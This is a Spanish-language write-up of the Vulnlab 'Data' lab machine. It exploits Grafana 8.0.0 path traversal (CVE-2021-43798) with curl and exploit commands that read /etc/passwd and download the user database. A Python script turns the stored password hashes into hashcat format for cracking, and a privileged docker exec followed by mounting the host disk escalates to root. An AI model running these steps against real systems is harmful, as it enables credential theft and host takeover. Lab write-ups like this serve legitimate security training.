Data - Writeup (Vulnlab)


NMAP
sudo nmap --min-rate 4500 --max-rtt-timeout 1500ms -p- 10.10.117.3
Investigando GRAFANA – Port 3000
Grafana es una potente herramienta de visualización de datos de código abierto, utilizada principalmente para monitorear y analizar datos de series temporales. Es popular en la industria por su capacidad para integrarse con una variedad de fuentes de datos y su interfaz de usuario intuitiva.
Buscando posibles CVE/Exploits.
Al pie de la imagen más arriba, en el login, se ve que la versión actual de Grafana es la v8.0.0. Procedo a verificar si es vulnerable y con un simple googling encuentro el siguiente CVE-2021-43798 y un exploit escrito en GoLang. Este CVE esta basado en la vulnerabilidad encontrada por el user j0v, y es un Path Traversal, con el cual nos va a permitir acceder a archivos como /etc/passwd o bajar directamente la base de datos.
Reference –> https://github.com/taythebot/CVE-2021-43798
./exploit -target http://data.local:3000 -file /etc/passwd
Para bajar la base de datos, algo que suena interesante, el help del exploit indica el argumento “-dump-database”
Esto nos volcaría toda la db. Tenemos otro modo mas cómodo con curl y que cumple la misma función, eso si necesitamos ver el exploit lo que explota literalmente el path traversal para replicarlo manualmente, luego lo bajamos como archivo del siguiente modo:
curl -o grafana.db --path-as-is http://data.vl:3000/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db
Podemos abrir cómodamente el archivo .db con DB Browser for SQLite, un freeware tool gráfico, o usar el comando sqlite3. De cualquier modo, obtendremos lo siguiente:
Luego de buscar un poco por internet, familiarizarme como es que realiza el encriptado para intentar crackearlo, verifico esta pagina completa de como explotar y luego crackear los hashes.
Reference: https://vulncheck.com/blog/grafana-cve-2021-43798
Los hashes son creados usando PBKDF2-HMAC-SHA256 El cual puede ser crackeado por HASHCAT.
Siguiendo la lectura de la web, hay una porción de código que junto a los datos de la base que descargamos podríamos generar un formato de hash correcto para pasarlo a hashcat.
Adapto ese codigo a python3:
#!/usr/bin/env python3
# _*_ CODING:UTF8 _*_
# by shkz
import sqlite3
import base64
import hashlib
# Connecting to DB
conn = sqlite3.connect('grafana.db')
cursor = conn.cursor()
cursor.execute("SELECT email, password, salt, rands FROM user WHERE login = 'boris'")
rows = cursor.fetchall()
# Writing to File: hashFile.txt
with open('hashFile.txt', 'w') as hash_file:
for row in rows:
email, password, salt, rands = row
decoded_hash = bytes.fromhex(password)
hash64 = base64.standard_b64encode(decoded_hash).decode('utf-8')
salt64 = base64.standard_b64encode(salt.encode('utf-8')).decode('utf-8')
hash_file.write(f"sha256:10000:{salt64}:{hash64}\n")
conn.close()
print("\nFile created: hashFile.txt\n")
Ejecutando el codigo me lo formatea del siguiente modo:
Crackeando con HASHCAT
Si verifico en la listas de ejemplo de hashcat: https://hashcat.net/wiki/doku.php?id=example_hashes. Logro identificar nuestro objetivo:
Crackeamos el archivo hashFile.txt creado con la info del usuario BORIS de la db:
hashcat -m 10900 hashFile.txt ~/w0rd/rockyou.txt
Luego de unos segundos, Cracked!:
USER: Boris and PrivESC
Una vez que estoy como Boris, solo resta hacer cat al user.txt y obtener la flag.
Como es costumbre, verifico el sudo:
sudo -l
La salida de SUDO nos dice que podríamos ejecutar docker exec como ROOT.
Luego de revisar el host, las conexiones y demás.. noto que claramente estoy dentro de un contenedor. En principio mediante el LFI había conseguido el /etc/passwd , en donde entre esa lista de users existía grafana:
Si vuelvo al exploit y trato de verificar el nombre del contenedor:
./exploit -file /etc/hostname -target http://data.vl:3000
--> e6ff5b1cbc85
Luego de saber esto estoy listo para ser root del container:
sudo docker exec -it --privileged -u root e6ff5b1cbc85 sh
Verifico los discos:
Monto el disco xvda1 a una carpeta en /mnt/testing, y finalmente leo la flag de root/root.txt:
mkdir -p /mnt/testing
mount /dev/xvda1 /mnt/testing/
cat root/root.txt
Pwn3d!
Subscribe to my newsletter
Read articles from shkz directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

shkz
shkz
I am shkz, a Security Researcher, Red Team and CTF Player.